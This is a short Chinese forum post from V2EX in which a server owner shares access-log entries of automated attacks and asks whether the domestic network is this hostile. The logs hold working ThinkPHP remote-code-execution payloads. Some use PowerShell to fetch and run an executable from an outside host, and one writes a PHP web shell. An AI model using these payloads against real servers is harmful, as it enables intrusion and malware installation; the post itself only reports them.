每一次打开 log 都能看到很多类似于这样的请求:
"GET /mysql/admin/index.php?lang=en HTTP/1.1" 302 -
"GET /mysql/dbadmin/index.php?lang=en HTTP/1.1" 302 -
"GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 302 -
"GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 302 -
"GET /phpmyadmin/index.php?lang=en HTTP/1.1" 302 -
"GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/rlbenhicipcezpw29172.exe');start%20%SystemRoot%/Temp/rlbenhicipcezpw29172.exe HTTP/1.1" 302 -
"GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 302 -
"GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/rlbenhicipcezpw29172.exe');start%20%SystemRoot%/Temp/rlbenhicipcezpw29172.exe HTTP/1.1" 302 -
域名解析设置是境内解析到阿里云,境外解析到 Vultr,而同一域名下 Vultr 的那台机子就没有这些。
国内的网络环境这么危机四伏的?怕不是开一个月再登数据全丢。
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.